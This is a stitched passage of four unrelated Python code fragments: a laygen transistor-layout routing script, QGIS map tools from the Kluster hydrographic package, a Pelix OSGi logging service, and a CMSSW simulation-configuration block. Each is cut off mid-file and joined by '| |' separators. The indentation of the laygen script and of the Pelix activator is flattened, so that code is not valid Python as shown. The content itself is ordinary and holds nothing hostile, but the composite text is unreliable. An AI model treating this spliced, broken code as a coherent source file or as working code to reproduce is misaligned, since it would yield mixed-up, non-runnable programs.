in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin)
in1 = laygen.relplace("I"+objectname_pfix+'N1', devname_nmos_body, pg, in0.name, shape=np.array([m, 1]))
in2 = laygen.relplace("I"+objectname_pfix+'N2', devname_nmos_boundary, pg, in1.name)
ip0 = laygen.relplace("I"+objectname_pfix+'P0', devname_pmos_boundary, pg, in0.name, direction='top', transform='MX')
ip1 = laygen.relplace("I"+objectname_pfix+'P1', devname_pmos_body, pg, ip0.name, transform='MX', shape=np.array([m, 1]))
ip2 = laygen.relplace("I"+objectname_pfix+'P3', devname_pmos_boundary, pg, ip1.name, transform='MX')
# route
# horizontal route style
# input
for i in range(m):
laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]),
refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([i, 0]),
)
laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
refinstname0=ip1.name, refpinname0='G0', refinstindex0=np.array([i, 0]),
refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([i, 0]),
)
# vdd/vss
if m==1:
laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3,
refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]),
refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]),
)
laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3,
refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]),
refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]),
)
else:
laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3,
refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]),
refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]))
laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3,
refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]),
refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]))
for i in range(m):
laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]),
gridname=rg_m1m2)
laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([i, 0]),
gridname=rg_m1m2)
laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]),
gridname=rg_m1m2)
laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]),
gridname=rg_m1m2)
laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([m-1, 0]),
gridname=rg_m2m3)
laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]),
gridname=rg_m2m3)
rvss = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3,
refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]),
refinstname1=ip1.name, refpinname1='S0', refinstindex1=np.array([0, 0]))
rvdd = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3,
refinstname0=in1.name, refpinname0='S1', refinstindex0=np.array([m-1, 0]),
refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]))
#align output to input pin
# power and groud rail
xy = laygen.get_template_size(in2.cellname, rg_m1m2) * np.array([1, 0])
laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
refinstname0=ip0.name, refinstname1=ip2.name)
laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
refinstname0=in0.name, refinstname1=in2.name)
# power and ground route
xy_s0 = laygen.get_template_pin_coord(in1.cellname, 'S0', rg_m1m2)[0, :]
for i in range(m):
laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2,
refinstname0=in1.name, refinstindex0=np.array([i, 0]),
refinstname1=in1.name, refinstindex1=np.array([i, 0]))
laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2,
refinstname0=ip1.name, refinstindex0=np.array([i, 0]),
refinstname1=ip1.name, refinstindex1=np.array([i, 0]))
laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([i, 0]))
laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2,refinstindex=np.array([i, 0]))
xy_s1 = laygen.get_template_pin_coord(in1.cellname, 'S1', rg_m1m2)[0, :]
laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2,
refinstname0=in1.name, refinstindex0=np.array([m-1, 0]),
refinstname1=in1.name, refinstindex1=np.array([m-1, 0]))
laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2,
refinstname0=ip1.name, refinstindex0=np.array([m-1, 0]),
refinstname1=ip1.name, refinstindex1=np.array([m-1, 0]))
laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0]))
laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0]))
# pin
rvdd0_pin_xy = laygen.get_rect_xy(rvdd.name, rg_m2m3_pin, sort=True)
rvss0_pin_xy = laygen.get_rect_xy(rvss.name, rg_m2m3_pin, sort=True)
rvdd0_pin_xy[0][1] = rvss0_pin_xy[0][1] - 1
rvdd0_pin_xy[1][1] = | |
<filename>HSTB/kluster/gui/backends/_qgis.py
import os, sys
import numpy as np
from typing import Union
from pyproj import CRS
from osgeo import gdal
from HSTB.kluster.gui.backends._qt import QtGui, QtCore, QtWidgets, Signal, qgis_enabled, found_path
if not qgis_enabled:
raise EnvironmentError('Unable to find qgis directory in {}'.format(found_path))
from HSTB.kluster.gui.backends._qt import qgis_core, qgis_gui
from HSTB.kluster import __file__ as klusterdir
from HSTB.kluster.gdal_helpers import gdal_raster_create, VectorLayer, gdal_output_file_exists, ogr_output_file_exists
from HSTB.kluster import kluster_variables
class DistanceTool(qgis_gui.QgsMapTool):
    """
    Render a green line and print the distance from start to end point using the WGS84 ellipsoid curvature.  Each
    click resets the map tool.  Distance is given in meters; if the tool finds a different unit is being provided,
    it raises an exception as that might be indicative of an issue with the ellipsoid set.
    """

    def __init__(self, canvas):
        self.canvas = canvas
        # NOTE(review): class derives from QgsMapTool but chains to
        # QgsMapToolEmitPoint.__init__ -- confirm which base was intended
        qgis_gui.QgsMapToolEmitPoint.__init__(self, self.canvas)
        self.rubberBand = qgis_gui.QgsRubberBand(self.canvas, True)
        self.rubberBand.setColor(QtCore.Qt.darkGreen)
        self.rubberBand.setFillColor(QtCore.Qt.transparent)
        self.rubberBand.setWidth(4)
        self.start_point = None
        self.end_point = None
        self.reset()

    def reset(self):
        """
        Clear the line
        """
        self.start_point = None
        self.end_point = None
        self.rubberBand.reset(qgis_core.QgsWkbTypes.LineGeometry)

    def canvasPressEvent(self, e):
        """
        Start a new line
        """
        self.start_point = self.toMapCoordinates(e.pos())
        self.end_point = self.start_point
        self.showLine(self.start_point, self.end_point)

    def canvasReleaseEvent(self, e):
        """
        Finish the line on releasing the mouse.  If the start and end point are the same, it just resets.
        Otherwise prints the distance in meters.
        """
        l = self.line()
        if l is not None:
            distance = qgis_core.QgsDistanceArea()
            distance.setEllipsoid('WGS84')
            m = distance.measureLine(self.start_point, self.end_point)
            units_enum = distance.lengthUnits()
            if units_enum != 0:
                raise ValueError('Something wrong with the distance units, got {} instead of 0=meters'.format(units_enum))
            print('******************************************************')
            print('Distance of {} meters'.format(round(m, 3)))
            print('******************************************************')
            self.start_point = None
        else:
            self.reset()

    def canvasMoveEvent(self, e):
        """
        Mouse movement resets and shows the new line where the end point is the current mouse position
        """
        if self.start_point is None:
            return
        self.end_point = self.toMapCoordinates(e.pos())
        self.showLine(self.start_point, self.end_point)

    def showLine(self, start_point: qgis_core.QgsPoint, end_point: qgis_core.QgsPoint):
        """
        Show the rubberband object from the provided start point to the end point.

        Parameters
        ----------
        start_point
            QgsPoint for the start of the line
        end_point
            QgsPoint for the end of the line
        """
        self.rubberBand.reset(qgis_core.QgsWkbTypes.LineGeometry)
        # BUGFIX: only a truly degenerate line (both coordinates equal) is
        # skipped.  The previous 'or' test also suppressed perfectly
        # horizontal or vertical drags, which are valid measurements.
        if start_point.x() == end_point.x() and start_point.y() == end_point.y():
            return
        point1 = qgis_core.QgsPointXY(start_point.x(), start_point.y())
        point2 = qgis_core.QgsPointXY(end_point.x(), end_point.y())
        self.rubberBand.addPoint(point1, False)
        self.rubberBand.addPoint(point2, True)
        self.rubberBand.show()

    def line(self):
        """
        Return the linestring if the start and end points form a real line, else None
        """
        if self.start_point is None or self.end_point is None:
            return None
        # BUGFIX: 'and' here for the same reason as showLine -- a horizontal
        # or vertical drag is still a measurable line
        if self.start_point.x() == self.end_point.x() and self.start_point.y() == self.end_point.y():
            return None
        return qgis_core.QgsLineString(self.start_point, self.end_point)

    def deactivate(self):
        """
        Turn the tool off, make sure to clear the rubberband as well
        """
        self.reset()
        qgis_gui.QgsMapTool.deactivate(self)
        self.deactivated.emit()
class QueryTool(qgis_gui.QgsMapTool):
    """
    Get the value for all raster layers loaded at the mouse position.  We filter out vector layers and any loaded
    WMS background layers, so only surface (raster) layers are queried.
    """

    def __init__(self, parent):
        # parent owns both the canvas and the QgsProject we query
        self.parent = parent
        qgis_gui.QgsMapTool.__init__(self, self.parent.canvas)

    def canvasPressEvent(self, e):
        """
        On press we print out the tooltip text to the stdout
        """
        text = self._get_cursor_data(e)
        print('******************************************************')
        print(text)
        print('******************************************************')

    def canvasMoveEvent(self, e):
        """
        On moving the mouse, we get the new raster information at mouse position and show a new tooltip
        """
        text = self._get_cursor_data(e)
        QtWidgets.QToolTip.showText(self.parent.canvas.mapToGlobal(self.parent.canvas.mouseLastXY()), text,
                                    self.parent.canvas, QtCore.QRect(), 1000000)

    def deactivate(self):
        """
        Deactivate the tool
        """
        qgis_gui.QgsMapTool.deactivate(self)
        self.deactivated.emit()

    def _get_cursor_data(self, e):
        """
        Build the tooltip/stdout text for the mouse position: latitude/longitude plus, for every non-WMS raster
        layer, each band value under the cursor.  Virtual file system ('/vsimem/') prefixes are trimmed from layer
        names for display.
        """
        x = e.pos().x()
        y = e.pos().y()
        point = self.parent.canvas.getCoordinateTransform().toMapCoordinates(x, y)
        text = 'Latitude: {}, Longitude: {}'.format(round(point.y(), 7), round(point.x(), 7))
        for name, layer in self.parent.project.mapLayers().items():
            if layer.type() == qgis_core.QgsMapLayerType.RasterLayer:
                if layer.dataProvider().name() != 'wms':
                    try:
                        layer_point = self.parent.map_point_to_layer_point(layer, point)
                        ident = layer.dataProvider().identify(layer_point, qgis_core.QgsRaster.IdentifyFormatValue)
                        if ident:
                            lname = layer.name()
                            if lname[0:8] == '/vsimem/':
                                lname = lname[8:]
                            text += '\n\n{}'.format(lname)
                            for ky, val in ident.results().items():
                                text += '\n{}: {}'.format(layer.bandName(ky), round(val, 3))
                    # narrowed from a bare 'except:' -- a point outside the
                    # layer transform is expected and intentionally skipped
                    except Exception:
                        pass
        return text
class SelectTool(qgis_gui.QgsMapToolEmitPoint):
    """
    Drag-select a box; the corner coordinates are emitted through the ``select`` signal when the mouse button is
    released.  Kluster uses this tool to select lines.
    """

    # minlat, maxlat, minlon, maxlon in Map coordinates (WGS84 for Kluster)
    select = Signal(float, float, float, float)

    def __init__(self, canvas):
        self.canvas = canvas
        qgis_gui.QgsMapToolEmitPoint.__init__(self, self.canvas)
        self.rubberBand = qgis_gui.QgsRubberBand(self.canvas, True)
        self.rubberBand.setColor(QtCore.Qt.transparent)
        self.rubberBand.setFillColor(QtGui.QColor(0, 0, 255, 50))
        self.start_point = None
        self.end_point = None
        self.reset()

    def reset(self):
        """
        Drop any in-progress rectangle and stop tracking the mouse
        """
        self.start_point = None
        self.end_point = None
        self.isEmittingPoint = False
        self.rubberBand.reset(qgis_core.QgsWkbTypes.PolygonGeometry)

    def canvasPressEvent(self, e):
        """
        Anchor the rectangle at the clicked map position
        """
        self.start_point = self.toMapCoordinates(e.pos())
        self.end_point = self.start_point
        self.isEmittingPoint = True
        self.showRect(self.start_point, self.end_point)

    def canvasReleaseEvent(self, e):
        """
        Emit the selected extents (min/max lat, min/max lon) and clear the drawing
        """
        self.isEmittingPoint = False
        extents = self.rectangle()
        if extents is not None:
            self.select.emit(extents.yMinimum(), extents.yMaximum(),
                             extents.xMinimum(), extents.xMaximum())
        self.reset()

    def canvasMoveEvent(self, e):
        """
        Grow/shrink the rectangle to follow the cursor while dragging
        """
        if not self.isEmittingPoint:
            return
        self.end_point = self.toMapCoordinates(e.pos())
        self.showRect(self.start_point, self.end_point)

    def showRect(self, start_point: qgis_core.QgsPoint, end_point: qgis_core.QgsPoint):
        """
        Redraw the rubberband rectangle between the two corner points.

        Parameters
        ----------
        start_point
            QgsPoint for the start of the rect
        end_point
            QgsPoint for the end of the rect
        """
        self.rubberBand.reset(qgis_core.QgsWkbTypes.PolygonGeometry)
        if start_point.x() == end_point.x() or start_point.y() == end_point.y():
            return  # zero-width/zero-height rect, nothing to draw
        x0, y0 = start_point.x(), start_point.y()
        x1, y1 = end_point.x(), end_point.y()
        corners = (qgis_core.QgsPointXY(x0, y0),
                   qgis_core.QgsPointXY(x0, y1),
                   qgis_core.QgsPointXY(x1, y1),
                   qgis_core.QgsPointXY(x1, y0))
        for corner in corners[:-1]:
            self.rubberBand.addPoint(corner, False)
        self.rubberBand.addPoint(corners[-1], True)  # True -> update canvas now
        self.rubberBand.show()

    def rectangle(self):
        """
        Return the QgsRectangle for the dragged area, or None when degenerate or unset
        """
        if self.start_point is None or self.end_point is None:
            return None
        if self.start_point.x() == self.end_point.x() or self.start_point.y() == self.end_point.y():
            return None
        return qgis_core.QgsRectangle(self.start_point, self.end_point)

    def deactivate(self):
        """
        Turn off the tool
        """
        qgis_gui.QgsMapTool.deactivate(self)
        self.deactivated.emit()
class RectangleMapTool(qgis_gui.QgsMapToolEmitPoint):
    """
    Draw a persistent black rectangle on the screen and emit the coordinates for the rect in map coordinate system.
    Unlike SelectTool, the drawn rectangle stays on screen after the mouse button is released.
    """

    # minlat, maxlat, minlon, maxlon in Map coordinates (WGS84 for Kluster)
    select = Signal(float, float, float, float)

    def __init__(self, canvas):
        self.canvas = canvas
        qgis_gui.QgsMapToolEmitPoint.__init__(self, self.canvas)
        self.rubberBand = qgis_gui.QgsRubberBand(self.canvas, True)
        self.rubberBand.setColor(QtCore.Qt.black)
        self.rubberBand.setFillColor(QtCore.Qt.transparent)
        self.rubberBand.setWidth(1)
        self.start_point = None
        self.end_point = None
        self.reset()

    def reset(self):
        """
        Discard the rectangle and stop tracking mouse movement
        """
        self.start_point = None
        self.end_point = None
        self.isEmittingPoint = False
        self.rubberBand.reset(qgis_core.QgsWkbTypes.PolygonGeometry)

    def canvasPressEvent(self, e):
        """
        Anchor a fresh rectangle at the clicked map position
        """
        self.start_point = self.toMapCoordinates(e.pos())
        self.end_point = self.start_point
        self.isEmittingPoint = True
        self.showRect(self.start_point, self.end_point)

    def canvasReleaseEvent(self, e):
        """
        Emit the corner extents; the rectangle stays drawn (persistent tool)
        """
        self.isEmittingPoint = False
        extents = self.rectangle()
        if extents is not None:
            self.select.emit(extents.yMinimum(), extents.yMaximum(),
                             extents.xMinimum(), extents.xMaximum())

    def canvasMoveEvent(self, e):
        """
        Track the cursor while the button is held, updating the rectangle continuously
        """
        if not self.isEmittingPoint:
            return
        self.end_point = self.toMapCoordinates(e.pos())
        self.showRect(self.start_point, self.end_point)

    def showRect(self, start_point: qgis_core.QgsPoint, end_point: qgis_core.QgsPoint):
        """
        Redraw the rubberband rectangle between the two corner points.

        Parameters
        ----------
        start_point
            QgsPoint for the start of the rect
        end_point
            QgsPoint for the end of the rect
        """
        self.rubberBand.reset(qgis_core.QgsWkbTypes.PolygonGeometry)
        if start_point.x() == end_point.x() or start_point.y() == end_point.y():
            return  # zero-area rectangle, nothing to draw
        x0, y0 = start_point.x(), start_point.y()
        x1, y1 = end_point.x(), end_point.y()
        corners = (qgis_core.QgsPointXY(x0, y0),
                   qgis_core.QgsPointXY(x0, y1),
                   qgis_core.QgsPointXY(x1, y1),
                   qgis_core.QgsPointXY(x1, y0))
        for corner in corners[:-1]:
            self.rubberBand.addPoint(corner, False)
        self.rubberBand.addPoint(corners[-1], True)  # True -> update canvas now
        self.rubberBand.show()

    def rectangle(self):
        """
        Return the QgsRectangle for the drawn corners, or None when degenerate or unset
        """
        if self.start_point is None or self.end_point is None:
            return None
        if self.start_point.x() == self.end_point.x() or self.start_point.y() == self.end_point.y():
            return None
        return qgis_core.QgsRectangle(self.start_point, self.end_point)

    def deactivate(self):
        """
        Clear the drawing and deactivate the map tool
        """
        self.reset()
        qgis_gui.QgsMapTool.deactivate(self)
        self.deactivated.emit()
def raster_shader(lyrmin: float, lyrmax: float):
"""
Use the provided minimum/maximum layer value to build a color ramp for rendering surface tifs. We don't have the
ability in Kluster to pick a color ramp, we just give them this one.
Parameters
----------
lyrmin
minimum value for | |
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Implementation of the OSGi LogService, based on Python standard logging
:author: <NAME>
:copyright: Copyright 2020, <NAME>
:license: Apache License 2.0
:version: 1.0.1
..
Copyright 2020 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Standard library
import collections
import datetime
import logging
import sys
import time
import traceback
# Pelix
import pelix.framework
from pelix.constants import BundleActivator
from pelix.misc import (
LOG_SERVICE,
LOG_READER_SERVICE,
PROPERTY_LOG_LEVEL,
PROPERTY_LOG_MAX_ENTRIES,
)
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (1, 0, 1)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# Local logger
logger = logging.getLogger(__name__)
# Definition of the log levels (OSGi values)
LOG_ERROR = 1
LOG_WARNING = 2
LOG_INFO = 3
LOG_DEBUG = 4
# OSGi level => Python logging level
OSGI_TO_LEVEL = {
LOG_DEBUG: logging.DEBUG,
LOG_INFO: logging.INFO,
LOG_WARNING: logging.WARNING,
LOG_ERROR: logging.ERROR,
}
# Python logging level => OSGi level
LEVEL_TO_OSGI = {
logging.DEBUG: LOG_DEBUG,
logging.INFO: LOG_INFO,
logging.WARNING: LOG_WARNING,
logging.ERROR: LOG_ERROR,
logging.CRITICAL: LOG_ERROR,
}
# ------------------------------------------------------------------------------
class LogEntry(object):
    """
    Represents a log entry
    """

    __slots__ = (
        "__bundle",
        "__exception",
        "__level",
        "__message",
        "__reference",
        "__time",
        "__record",
    )

    def __init__(self, level, message, exception, bundle, reference):
        """
        :param level: The Python log level of the entry
        :param message: A human readable message
        :param exception: The exception associated to the entry (or None)
        :param bundle: The bundle that created the entry (or None)
        :param reference: The service reference associated to the entry (or None)
        """
        self.__bundle = bundle
        self.__exception = exception
        self.__level = level
        self.__message = message
        self.__reference = reference
        # Timestamp taken at construction, exposed via the ``time`` property
        self.__time = time.time()
        # Lazily-built logging.LogRecord cache (see to_record)
        self.__record = None

    def __str__(self):
        """
        String representation
        """
        values = [
            # 7: length of "WARNING"
            "{0: ^7} ::".format(logging.getLevelName(self.__level)),
            # Date
            str(datetime.datetime.fromtimestamp(self.__time)),
            "::",
        ]
        if self.__bundle:
            # Bundle name
            values.append(
                "{0: <20s} ::".format(self.__bundle.get_symbolic_name())
            )
        # Message
        values.append(self.__message)
        if not self.__exception:
            # Print as is
            return " ".join(values)
        # Print the exception too
        return "{0}\n{1}".format(" ".join(values), self.__exception)

    @property
    def bundle(self):
        """
        The bundle that created this entry (may be None)
        """
        return self.__bundle

    @property
    def message(self):
        """
        The message associated to this entry
        """
        return self.__message

    @property
    def exception(self):
        """
        The exception associated to this entry
        """
        return self.__exception

    @property
    def level(self):
        """
        The log level of this entry (Python constant)
        """
        return self.__level

    @property
    def osgi_level(self):
        """
        The log level of this entry (OSGi constant)
        """
        return LEVEL_TO_OSGI.get(self.__level, LOG_INFO)

    @property
    def reference(self):
        """
        The reference to the service associated to this entry (may be None)
        """
        return self.__reference

    @property
    def time(self):
        """
        The timestamp of this entry
        """
        return self.__time

    def to_record(self):
        # type: () -> logging.LogRecord
        """
        Returns this object as a ``logging.LogRecord`` (built once, then cached)
        """
        if self.__record is None:
            # Construct the record on demand
            self.__record = self.__make_record()
        return self.__record

    def __make_record(self):
        """
        Converts this object into a ``logging.LogRecord`` object
        """
        # The bundle can legitimately be None (see __str__): fall back to
        # placeholder values instead of crashing on attribute access
        bundle = self.bundle
        if bundle is not None:
            name = bundle.get_symbolic_name()
            pathname = bundle.get_location()
        else:
            name = "n/a"
            pathname = "n/a"
        lineno = 0
        args = []
        func = "n/a"
        sinfo = None
        level = self.level
        msg = self.message
        # NOTE(review): the stored exception is passed straight through as
        # exc_info -- confirm callers store an exc_info tuple (or None) here
        exc_info = self.exception
        # Construct the record
        record = logging.LogRecord(
            name, level, pathname, lineno, msg, args, exc_info, func, sinfo
        )
        # Rebase the record's timestamps onto this entry's creation time,
        # keeping relativeCreated consistent with logging's start time
        log_start_time = record.created - (record.relativeCreated / 1000)
        creation_time = self.__time
        record.created = creation_time
        record.msecs = (creation_time - int(creation_time)) * 1000
        record.relativeCreated = (creation_time - log_start_time) * 1000
        return record
class LogReaderService:
    """
    The LogReader service: keeps a bounded history of log entries and
    notifies subscribed listeners about each new one.
    """

    def __init__(self, context, max_entries):
        """
        :param context: The bundle context
        :param max_entries: Maximum stored entries
        """
        self._context = context
        # Bounded storage: oldest entries are evicted automatically
        self.__logs = collections.deque(maxlen=max_entries)
        self.__listeners = set()

    def add_log_listener(self, listener):
        """
        Subscribes a listener to log events.

        A log listener is an object providing with a ``logged`` method, with
        the following signature:

        .. code-block:: python

            def logged(self, log_entry):
                '''
                A log entry (LogEntry) has been added to the log service
                '''
                # ...

        :param listener: A new listener
        """
        if listener is None:
            return
        self.__listeners.add(listener)

    def remove_log_listener(self, listener):
        """
        Unsubscribes a listener from log events.

        :param listener: The listener to remove
        """
        self.__listeners.discard(listener)

    def get_log(self):
        """
        Returns the logs events kept by the service

        :return: A tuple of log entries
        """
        return tuple(self.__logs)

    def _store_entry(self, entry):
        """
        Stores a new log entry and notifies listeners

        :param entry: A LogEntry object
        """
        self.__logs.append(entry)
        # Iterate over a snapshot: a listener may (un)subscribe during the
        # notification
        for listener in tuple(self.__listeners):
            try:
                listener.logged(entry)
            except Exception as ex:
                # Create a new log entry, without using logging nor notifying
                # listener (to avoid a recursion)
                err_entry = LogEntry(
                    logging.WARNING,
                    "Error notifying logging listener {0}: {1}".format(
                        listener, ex
                    ),
                    sys.exc_info(),
                    self._context.get_bundle(),
                    None,
                )
                # Insert the new entry before the real one
                self.__logs.pop()
                self.__logs.append(err_entry)
                self.__logs.append(entry)
class LogServiceInstance:
    # pylint: disable=R0903
    """
    Instance of the log service given to a bundle by the factory.
    Forwards every message to the Log Reader service as a LogEntry.
    """

    __slots__ = ("__reader", "__bundle")

    def __init__(self, reader, bundle):
        """
        :param reader: The Log Reader service
        :param bundle: Bundle associated to this instance
        """
        self.__reader = reader
        self.__bundle = bundle

    def log(self, level, message, exc_info=None, reference=None):
        # pylint: disable=W0212
        """
        Logs a message, possibly with an exception

        :param level: Severity of the message (Python logging level)
        :param message: Human readable message
        :param exc_info: The exception context (sys.exc_info()), if any
        :param reference: The ServiceReference associated to the log
        """
        # Drop anything that is not a real ServiceReference
        if not isinstance(reference, pelix.framework.ServiceReference):
            reference = None

        # Format the exception right away to avoid memory leaks
        # (keeping traceback frames alive)
        exception_str = None
        if exc_info is not None:
            try:
                exception_str = "\n".join(
                    traceback.format_exception(*exc_info)
                )
            except (TypeError, ValueError, AttributeError):
                exception_str = "<Invalid exc_info>"

        # Store the LogEntry
        self.__reader._store_entry(
            LogEntry(level, message, exception_str, self.__bundle, reference)
        )
class LogServiceFactory(logging.Handler):
    """
    Log Service Factory: provides a logger per bundle.

    Also acts as a ``logging.Handler`` so that records emitted through the
    standard Python logging API are mirrored into the Log Reader service.
    """

    def __init__(self, context, reader, level):
        """
        :param context: The bundle context
        :param reader: The Log Reader service
        :param level: The minimal log level of this handler
        """
        logging.Handler.__init__(self, level)
        self._framework = context.get_framework()
        self._reader = reader

    def _bundle_from_module(self, module_object):
        """
        Find the bundle associated to a module

        :param module_object: A Python module object, or a module name
        :return: The Bundle object associated to the module, or None
        """
        try:
            # Get the module name
            module_object = module_object.__name__
        except AttributeError:
            # We got a string
            pass
        return self._framework.get_bundle_by_name(module_object)

    def emit(self, record):
        # pylint: disable=W0212
        """
        Handle a message logged with the logger

        :param record: A log record
        """
        # Get the bundle (can be None if no bundle matches the module)
        bundle = self._bundle_from_module(record.module)

        # Fix: the exception attached to the record used to be silently
        # dropped.  Format it immediately (like LogServiceInstance.log does,
        # to avoid keeping traceback frames alive) and keep it in the entry.
        exception_str = None
        if record.exc_info:
            try:
                exception_str = "\n".join(
                    traceback.format_exception(*record.exc_info)
                )
            except (TypeError, ValueError, AttributeError):
                exception_str = "<Invalid exc_info>"

        # Convert to a LogEntry and store it
        entry = LogEntry(
            record.levelno, record.getMessage(), exception_str, bundle, None
        )
        self._reader._store_entry(entry)

    def get_service(self, bundle, registration):
        # pylint: disable=W0613
        """
        Returns an instance of the log service for the given bundle

        :param bundle: Bundle consuming the service
        :param registration: Service registration bean
        :return: An instance of the logger
        """
        return LogServiceInstance(self._reader, bundle)

    @staticmethod
    def unget_service(bundle, registration):
        """
        Releases the service associated to the given bundle

        :param bundle: Consuming bundle
        :param registration: Service registration bean
        """
        pass
@BundleActivator
class Activator(object):
"""
The bundle activator
"""
def __init__(self):
self.__reader_reg = None
self.__factory_reg = None
self.__factory = None
@staticmethod
def get_level(context):
"""
Get the log level from the bundle context (framework properties)
:param context: A bundle context
:return: A log level (int)
"""
# Get the log level
level_value = context.get_property(PROPERTY_LOG_LEVEL)
if level_value:
for converter in int, logging.getLevelName:
try:
parsed_level = converter(level_value)
if isinstance(parsed_level, int):
# Got a valid level
return parsed_level
except (ValueError, TypeError):
pass
# By default, use the INFO level
return logging.INFO
def start(self, context):
"""
Bundle starting
:param context: The bundle context
"""
# Get the maximum number of entries authorized
max_entries = context.get_property(PROPERTY_LOG_MAX_ENTRIES)
try:
# Normalize the value
max_entries = int(max_entries)
except (ValueError, TypeError):
max_entries = 100
# Register the LogReader service
reader = LogReaderService(context, max_entries)
self.__reader_reg = context.register_service(
LOG_READER_SERVICE, reader, {}
)
# Register the LogService factory
self.__factory = LogServiceFactory(
context, reader, self.get_level(context)
)
self.__factory_reg = | |
= cms.untracked.double(0.0)
)
# Inputs shared by the simulation-validation modules: the smeared
# generator-level MC truth collection and a verbosity switch.
VerificationCommonParameters = cms.PSet(
    MCTruthCollection = cms.InputTag("generatorSmeared"),
    verboseDBE = cms.untracked.bool(False)
)
# Parameters for the APD digitization in the ECAL simulation.
# NOTE(review): parameter semantics (shape constants, PE conversions) come
# from the ECAL digitizer code — values kept exactly as configured upstream.
apd_sim_parameters = cms.PSet(
    apdAddToBarrel = cms.bool(False),
    apdDigiTag = cms.string('APD'),
    apdDoPEStats = cms.bool(True),
    apdNonlParms = cms.vdouble(
        1.48, -3.75, 1.81, 1.26, 2.0,
        45, 1.0
    ),
    apdSeparateDigi = cms.bool(True),
    apdShapeTau = cms.double(40.5),
    apdShapeTstart = cms.double(74.5),
    apdSimToPEHigh = cms.double(88200000.0),
    apdSimToPELow = cms.double(2450000.0),
    apdTimeOffWidth = cms.double(0.8),
    apdTimeOffset = cms.double(-13.5)
)
# Histogramming configuration block (presumably for the MultiTrackValidator,
# "MTV" — confirm against the consumer module): per-plot particle selections
# plus histogram axis ranges and binning.
MTVHistoProducerAlgoForTrackerBlock = cms.PSet(
    # "Gp" selectors: one selection per efficiency-vs-X plot; they differ
    # only in the cut relevant to the plotted variable X
    GpSelectorForEfficiencyVsEta = cms.PSet(
        chargedOnly = cms.bool(True),
        lip = cms.double(30.0),
        maxRapidity = cms.double(2.5),
        minRapidity = cms.double(-2.5),
        pdgId = cms.vint32(),
        ptMin = cms.double(0.9),
        status = cms.int32(1),
        tip = cms.double(3.5)
    ),
    GpSelectorForEfficiencyVsPhi = cms.PSet(
        chargedOnly = cms.bool(True),
        lip = cms.double(30.0),
        maxRapidity = cms.double(2.5),
        minRapidity = cms.double(-2.5),
        pdgId = cms.vint32(),
        ptMin = cms.double(0.9),
        status = cms.int32(1),
